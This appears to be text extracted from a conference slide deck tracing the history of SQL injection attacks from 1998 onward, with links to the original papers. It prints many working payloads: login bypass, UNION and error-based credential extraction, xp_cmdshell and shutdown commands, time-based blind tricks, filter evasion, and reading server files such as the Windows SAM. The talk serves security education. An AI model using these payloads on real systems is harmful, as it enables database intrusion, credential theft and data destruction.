Sei sulla pagina 1di 51

Feliz 15 aniversario, SQL Injection!

What this talk is not about?

What this talk is not about?

What this talk is not about?

This is about Love

Los Amantes del Crculo Polar

25 Dec 1998: El nacimiento

http://www.phrack.org/issues.html?id=8&issue=54

Begining

Tautology

admin
or 1=1

q=Select uid from users where uid=+$user+ and pass=+pass+;


q=Select uid from users where uid=admin and pass= or 1=1;

14 Aug 2007: IBM

http://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerability

Place

Inband
-1 union select 1,1,1,1,username,1,a,1 from users --

2001 - OutBand

http://www.blackhat.com/presentations/bh-asia-01/litchfield/litchfield.doc

Yesterday - [Microsoft][ODBC SQL Server Driver]


[SQL Server]Incorrect syntax near the keyword 'or'.

q=Select title from noticias where ud=+$id+;

Id=1 or 1=(select top 1 username from sysusers) --

Jul 2007: Microsoft Partner Programme

2002 Advanced SQL Injection Techniques

https://sparrow.ece.cmu.edu/group/731-s11/readings/anley-sql-inj.pdf

Advanced Tricks
Username: '; begin declare @ret varchar(8000) set @ret=':' select
@ret=@ret+' '+username+'/'+password from users where username>@ret
select @ret as ret into foo end--

Username: ' union select ret,1,1,1 from foo--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07


[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value ': admin/r00tr0x! guest/guest chris/password
fred/sesame' to a column of data type int.

exec master..xp_cmdshell 'dir'

Id= 1; shutdown --

27 Mar - 2007

Outter Bands
DNS Queries
FTP Sites
SMB Files
Remote DB
Web Files

Log Files

Eyes of Fear

2002 - Blind
http://server/miphp.php?id=1 and 1=1
True
http://server/miphp.php?id=1 and 1=0
False

2010 US Army

2010 US Army

Time

2002 Time Based Blind SQL Injection

http://www.northernfortress.net/more_advanced_sql_injection.pdf

(more) Advanced Tricks

ping -n 10 127.0.0.1

if (ascii(substring(@s, @byte, 1)) & ( power(2, @bit))) > 0 waitfor delay '0:0:5'

2004 Time-Based in Other Databases


SQL Server
1) ; if wait for delay
2) ; exec xp_cmdshell (ping n)
Oracle
1) dms_lock.sleep()
PL/SLQ Injection
MySQL
1) and sleep()
5.0 or higher
2) Benchmarck functions
Postgres:
1) pg:sleep()

Jun 2007 : Solar Empire Exploit

http://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.html

Apr 2013: Yahoo!

http://tw.ysm.emarketing.yahoo.com/soeasy/index.php?p=
2&scId=113; select SLEEP(5)--

http://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.html

2007 Time-Based SQL Injection using Heavy Queries

https://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdf

Time-Based Using Heavy Queries in MS Access

True

False

Deep Blind SQL Injection

http://labs.portcullis.co.uk/application/deep-blind-sql-injection

Ace

Serialized SQL Injection

union select '1','2','3',(select * from sysusers for xml raw, binary base64)

pass=

Inverted Queries - Lefties


q=Select uid from users where +$user+=user and +pass+ pass;

Airthmetic Blind SQL Injection

Id=A+(1/(ASCII(B)-C))

Id=A+ASCII(B)-C

Id=A+((C/ASCII(B))*(K))

RFD (Remote File Downloading) SQL Server 2K

And 200>ASCII (SUBSTRING(SELECT * FROM


OPENROWSET('MSDASQL', 'Driver = {Microsoft Text Driver (*.txt;
*.csv)};DefaultDir=C:\;','select top 1 * from c:\dir\target.txt),1,1))
; Create Table TempTable as (row varchar(8000)) -; Bulk Insert TempTable From 'c:\file.ext' With (FIELDTERMINATOR = '\n',
ROWTERMINATOR = '\n) -; alter table TempTable add num int IDENTITY(1,1) NOT NULL
and (select COUNT(row) from TempTable)
and (select top 1 len(row) from TempTable where num = rownum)
and (select top 1 ASCII(SUBSTRING(row,1,1)) from TempTable where num
= 1)
; Drop Table TempTable--

RFD (Remote File Downloading) SQL Server 2K5++

AND 256 > ASCII(SUBSTRING ((SELECT * FROM OPENROWSET(BULK


'c:\windows\repair\sam', SINGLE_BLOB) As Data), 1, 1))

RFD (Remote File Downloading) MySQL

LoadFile
SELECT LOAD_FILE(0x633A5C626F6F742E696E69)

Load Data infile


; Create table C8DFC643 (datos varchar(4000))
; Load data infile 'c:\\boot.ini' into table C8DFC643
; alter table C8DFC643 add column num integer auto_increment
unique key
and (select count(num) from C8DFC643)
and (select length(datos) from C8DFC643 where num = 1)
and (select ASCII(substring(datos,5,1)) from C8DFC643 where num = 1)
; Drop table C8DFC643

RFD (Remote File Downloading) Oracle


External Tables & Plain Text Files
; execute immediate 'Create Directory A4A9308C As ''c:\'' '; end; - ; execute immediate 'Create table A737D141 ( datos varchar2(4000) ) organization
external (TYPE ORACLE_LOADER default directory A4A9308C access parameters (
records delimited by newline ) location (''boot.ini''))'; end;--

DBMS_LOB
; execute immediate
DECLARE l_bfile BFILE;
l_blob BLOB;
BEGIN INSERT INTO A737D141 (datos) VALUES (EMPTY_BLOB()) RETURN datos INTO
l_blob;
l_bfile := BFILENAME(''A4A9308C'', ''Picture.bmp'');
DBMS_LOB.fileopen(l_bfile, Dbms_Lob.File_Readonly);
DBMS_LOB.loadfromfile(l_blob,l_bfile,DBMS_LOB.getlength(l_bfile));
DBMS_LOB.fileclose(l_bfile);
COMMIT;
EXCEPTION
WHEN OTHERS THEN ROLLBACK;
END;
; end; --

CSRF+SQLi

Smuggling

/**/aNd/**/1=aSC(substr(user(),1,1))%00

Braveness

Connection String Parameter Pollution

http://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-StringParameter-Pollution-wp.pdf

XPath Injection

http://2stop.me/S%C3%A9curit%C3%A9%20Informatique/Web/EN%20-%20Blind%20Xpath%20injection.pdf

LDAP Injection

http://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf

OWASP TOP 10 - 2013

Forbidden

q=Select uid from users where uid=+$user+ and pass=+pass+;

Use Brain not tech


PHP Magic Quotes?

->

id=1 and 1=1

Python?

->

No invulnerable

.NET?

->

No invulnerable

LinQ?

->

No invulnerable

Fixing Code Injections isnt the worst job

More

@chemaalonso
http://www.elladodelmal.com
http://0xword.com/libros/25-libro-hacking-aplicaciones-web-sql-injection.html